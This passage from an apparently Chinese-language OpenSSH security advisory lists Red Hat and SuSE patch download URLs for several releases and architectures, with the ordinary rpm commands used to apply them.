ftp://updates.redhat.com/7.0/en/os/alpha/openssh-askpass-gnome-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-clients-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-server-3.1p1-5.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/openssh-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-askpass-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-askpass-gnome-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-clients-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-server-3.1p1-5.i386.rpm

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssh-3.1p1-5.src.rpm

alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-askpass-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-askpass-gnome-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-clients-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-server-3.1p1-5.alpha.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/openssh-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-askpass-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-askpass-gnome-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-clients-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-server-3.1p1-5.i386.rpm

ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-askpass-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-askpass-gnome-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-clients-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-server-3.1p1-5.ia64.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssh-3.1p1-6.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/openssh-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-askpass-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-askpass-gnome-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-clients-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-server-3.1p1-6.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-askpass-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-askpass-gnome-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-clients-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-server-3.1p1-6.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssh-3.1p1-6.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/openssh-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-askpass-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-askpass-gnome-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-clients-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-server-3.1p1-6.i386.rpm
可使用下列命令安装补丁:

rpm -Fvh [文件名]

S.u.S.E.
--------
S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2002:023)以及相应补丁:
SuSE-SA:2002:023:openssh
链接:http://www.suse.com/de/support/security/2002_023_openssh.html

补丁下载:

i386 Intel Platform

    SuSE-8.0
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.3p1-6.i386.patch.rpm

    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.2
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/i386/update/7.0/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/i386/update/7.0/zq1/openssh-3.3p1-6.src.rpm


    Sparc Platform

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/sparc/update/7.1/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/sparc/update/7.0/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/sparc/update/7.0/zq1/openssh-3.3p1-4.src.rpm


    AXP Alpha Platform

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/axp/update/7.1/sec1/openssh-3.3p1-4.alpha.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/axp/update/7.0/sec1/openssh-3.3p1-4.alpha.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/axp/update/7.0/zq1/openssh-3.3p1-4.src.rpm


    PPC Power PC Platform

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/ppc/update/7.0/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/ppc/update/7.0/zq1/openssh-3.3p1-4.src.rpm

补丁安装:

# rpm -Fvh openssh*.rpm
版权所有,未经许可,不得转载